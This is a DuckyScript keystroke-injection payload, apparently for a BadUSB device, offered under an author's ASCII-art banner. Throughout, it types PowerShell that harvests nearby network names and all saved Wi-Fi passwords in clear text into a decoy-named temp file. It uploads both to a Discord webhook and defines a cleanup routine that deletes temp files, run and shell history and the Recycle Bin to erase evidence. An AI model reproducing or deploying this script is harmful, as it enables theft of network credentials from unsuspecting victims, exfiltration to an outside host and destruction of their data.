REM  ____            _       _       _                        #                   _.-------.._                    -,
REM / ___|  ___ _ __(_)_ __ | |_    | |__  _   _              #               .-"```"--..,,_/ /`-,               -,  \
REM \___ \ / __| '__| | '_ \| __|   | '_ \| | | |             #            .:"          /:/  /'\  \     ,_...,  `. |  |
REM  ___) | (__| |  | | |_) | |_    | |_) | |_| |             #           /       ,----/:/  /`\ _\~`_-"`    _;
REM |____/ \___|_|  |_| .__/ \__|   |_.__/ \__, |             #          '      / /`"""'\ \ \.~`_-'      ,-"'/
REM                   |_|                  |___/              #         |      | |  0    | | .-'      ,/` /
REM                                                           #        |    ,..\ \     ,.-"`      ,/`   /
REM        __                                 __              #       ;    :    `/`""\`          ,/--==,/-----,
REM       / /___ __________ ___  _____  _____/ /              #       |    `-...|        -.___-Z:_______J...---;
REM  __  / / __ `/ ___/ __ `/ / / / _ \/ ___/ /               #       :         `                          _-'
REM / /_/ / /_/ / /__/ /_/ / /_/ /  __(__  ) /___             #      _L_  _     ___  ___  ___  ___  ____--"`
REM \____/\__,_/\___/\__, /\__,_/\___/____/_____/             #     | __|| |   |_ _|| _ \| _ \| __|| _ \
REM                    /_/                                    #     | _| | |__  | | |  _/|  _/| _| |   /
REM                                                           #     |_|  |____||___||_|  |_|  |___||_|_\
REM
REM                            Sometimes its okay,
REM                                       if its DARK...





REM Extract Nearby Networks and Wifi Passwords





REM Get Nearby Networks



WINDOWS m
DELAY 750
WINDOWS r
DELAY 200
STRING powershell
DELAY 50
ENTER
DELAY 1000
STRING $NearbyNetworks = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
DELAY 50
ENTER
DELAY 1000





REM Get PWs


STRING cd..
DELAY 50
ENTER
DELAY 100
STRING cd..
DELAY 50
ENTER
DELAY 100
STRING cd .\Windows\
DELAY 50
ENTER
DELAY 100
STRING cd .\Temp\
DELAY 50
ENTER
DELAY 100
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Schlüsselinhalt\W+\:(.+)$|Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); if (-not $pass) {$pass=$_.Matches.Groups[2].Value.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > RH5FXSTIZ4FFDebugLogFile.txt
DELAY 50
ENTER
DELAY 5000





REM Upload Discord



STRING function Upload-Discord {
DELAY 50
SHIFT ENTER
DELAY 100
STRING [CmdletBinding()]
DELAY 50
SHIFT ENTER
DELAY 100
STRING param (
DELAY 50
SHIFT ENTER
DELAY 100
STRING [parameter(Position=0,Mandatory=$False)]
DELAY 50
SHIFT ENTER
DELAY 100
STRING [string]$file,
DELAY 50
SHIFT ENTER
DELAY 100
STRING [parameter(Position=1,Mandatory=$False)]
DELAY 50
SHIFT ENTER
DELAY 100
STRING [string]$text
DELAY 50
SHIFT ENTER
DELAY 100
STRING )
DELAY 50
SHIFT ENTER
DELAY 100
STRING $hookurl = ''
DELAY 50
SHIFT ENTER
DELAY 100
STRING $Body = @{
DELAY 50
SHIFT ENTER
DELAY 100
STRING 'username' = $env:username
DELAY 50
SHIFT ENTER
DELAY 100
STRING 'content' = $text
DELAY 50
SHIFT ENTER
DELAY 100
STRING }
DELAY 50
SHIFT ENTER
DELAY 100
STRING if (-not ([string]::IsNullOrEmpty($text))){
DELAY 50
SHIFT ENTER
DELAY 100
STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};
DELAY 50
SHIFT ENTER
DELAY 100
STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
DELAY 50
SHIFT ENTER
DELAY 100
STRING }
DELAY 50
SHIFT ENTER
DELAY 50
ENTER
DELAY 1000





REM Execute Commands



STRING Upload-Discord -text "$NearbyNetworks"
DELAY 100
ENTER
DELAY 1000
STRING Upload-Discord -file "C:\Windows\Temp\RH5FXSTIZ4FFDebugLogFile.txt"
DELAY 100
ENTER
DELAY 3000





REM Clean Up Evidence



STRING function Clean-Exfil {
DELAY 50
SHIFT ENTER
DELAY 100
STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
DELAY 50
SHIFT ENTER
DELAY 100
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
DELAY 50
SHIFT ENTER
DELAY 100
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
DELAY 50
SHIFT ENTER
DELAY 100
STRING Clear-RecycleBin -Force -ErrorAction SilentlyContinue
DELAY 50
SHIFT ENTER
DELAY 100
STRING }
DELAY 50
SHIFT ENTER
DELAY 50
ENTER

DELAY 500
ALT F4
